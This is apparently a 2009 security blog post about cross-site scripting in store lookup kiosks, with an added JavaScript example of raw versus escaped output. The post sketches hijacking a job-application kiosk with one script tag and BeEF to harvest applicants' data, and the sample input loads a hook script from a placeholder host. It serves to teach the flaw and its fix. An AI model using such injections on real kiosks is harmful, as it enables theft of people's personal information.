XSS Kiosk Busting
You know those kiosks that you find in bookstores for looking up inventory? The idea of XSS-ing one occurred to me a few years ago, but I never really got a chance to play with any and forgot about it until recently. I was at Sur La Table last weekend, trying to figure out which kitchen supplies I haven't bought yet (turns out, it was more knives), and noticed the wedding/gift registry...

Mostly, I just think this is funny, but there are potential malicious applications for this kind of thing. For example, Wal-mart's job applications are done through a web application running on a kiosk in the customer service area. If you can inject JavaScript into that application, you could rewrite the whole thing to log personal information from applicants.
Presuming that those computers are connected to the internet (and I expect they are), it would only require that you inject a single <script> tag, and you could do all the rest with BeEF. Since it's a kiosk, nobody is able to look at the address bar or status bar and see that anything is wrong.
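The whole attack above hinges on one thing: the kiosk's lookup page echoing what was typed straight back into the markup. The following is an added example, not code from the original post or from any of the kiosks it mentions. It shows a minimal registry-lookup renderer twice, once reflecting the search term raw and once HTML-encoding it, plus a small check a reviewer or test harness can run over rendered output to flag a tag from untrusted input that survived. The function names (`renderLookupVulnerable`, `renderLookupSafe`, `escapeHtml`, `containsUnescapedTag`) and the sample search term are assumptions I constructed for the illustration.

```javascript
// Added example (not from the original post): a minimal registry-lookup
// renderer, once the vulnerable way and once with output encoding.
// Function names are hypothetical; SAMPLE_TERM is a constructed input.

// The five characters that matter in an HTML text context.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode untrusted text so the browser can only ever display it as text.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: drops the user's search term straight into the markup,
// which is exactly what lets a single injected tag take over the page.
function renderLookupVulnerable(term) {
  return `<h2>Results for: ${term}</h2>`;
}

// Hardened: same page, but the term is encoded before it reaches the DOM.
function renderLookupSafe(term) {
  return `<h2>Results for: ${escapeHtml(term)}</h2>`;
}

// Detection helper: true if any opening tag present in the untrusted input
// appears verbatim in the rendered HTML (i.e. encoding was skipped).
function containsUnescapedTag(html, untrusted) {
  const tags = String(untrusted).match(/<[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => html.includes(tag));
}

// Constructed sample input of the kind the post describes: a normal-looking
// search term with a script tag appended. The host name is a placeholder.
const SAMPLE_TERM =
  'chef knife<script src="https://example.invalid/hook.js"></script>';

// Renders both variants and reports whether each leaks the injected tag.
function demo() {
  const vuln = renderLookupVulnerable(SAMPLE_TERM);
  const safe = renderLookupSafe(SAMPLE_TERM);
  return {
    vulnerableLeaksTag: containsUnescapedTag(vuln, SAMPLE_TERM), // true
    safeLeaksTag: containsUnescapedTag(safe, SAMPLE_TERM), // false
    safeHtml: safe,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Output encoding at the point where text meets markup is the fix that matters; on a locked-down kiosk, where nobody can see the address bar, a Content-Security-Policy that disallows script from outside the kiosk's own origin is the sensible second layer, since it blocks the externally hosted script even if one encoding site is missed.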

Labels: Web Applications, XSS


6 Comments:
http://sla.ckers.org/forum/read.php?2,32184,32184#msg-32184
By Anonymous, At November 30, 2009 2:06 PM
*facepalm* ... that's about all I can add to this one!
Seems that the "cool" thing to do is put everyone "on the web" these days at the large corporations, particularly job application sites ... gee - I wonder how many "online job app sites" are vulnerable.
*gets an idea* ... ruh-roh.
By Raf, At November 30, 2009 2:06 PM
Did something similar @ the airport http://sla.ckers.org/forum/read.php?2,32184,32184#msg-32184
By Anonymous, At November 30, 2009 2:06 PM